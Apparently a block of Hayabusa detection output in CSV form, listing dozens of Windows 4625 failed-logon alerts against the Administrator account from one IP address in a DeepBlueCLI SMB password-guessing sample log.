+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
